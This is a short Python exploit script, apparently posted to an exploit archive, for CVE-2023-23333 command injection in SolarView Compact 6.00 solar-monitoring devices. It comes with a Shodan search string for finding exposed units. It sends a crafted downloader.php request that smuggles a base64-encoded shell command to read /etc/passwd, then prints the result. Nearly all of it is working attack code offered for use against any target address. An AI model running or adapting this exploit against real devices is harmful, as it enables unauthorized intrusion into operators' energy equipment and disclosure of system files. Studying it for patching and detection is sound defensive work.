#- Exploit Title: SolarView Compact 6.00 - Command Injection #- Shodan Dork: http.html:"solarview compact" #- Exploit Author: ByteHunter #- Email: [email protected] #- Version: 6.00 #- Tested on: 6.00 #- CVE : CVE-2023-23333 import argparse import requests def vuln_check(ip_address, port): url = f"http://{ip_address}:{port}/downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg%3D%3D|base64%20-d|bash%00.zip" response = requests.get(url) if response.status_code == 200: output = response.text if "root" in output: print("Vulnerability detected: Command Injection possible.") print(f"passwd file content:\n{response.text}") else: print("No vulnerability detected.") else: print("Error: Unable to fetch response.") def main(): parser = argparse.ArgumentParser(description="SolarView Compact Command Injection ") parser.add_argument("-i", "--ip", help="IP address of the target device", required=True) parser.add_argument("-p", "--port", help="Port of the the target device (default: 80)", default=80, type=int) args = parser.parse_args() ip_address = args.ip port = args.port vuln_check(ip_address, port) if __name__ == "__main__": main()
{{ x.nick }}
| Date:{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1 {{ x.comment }} |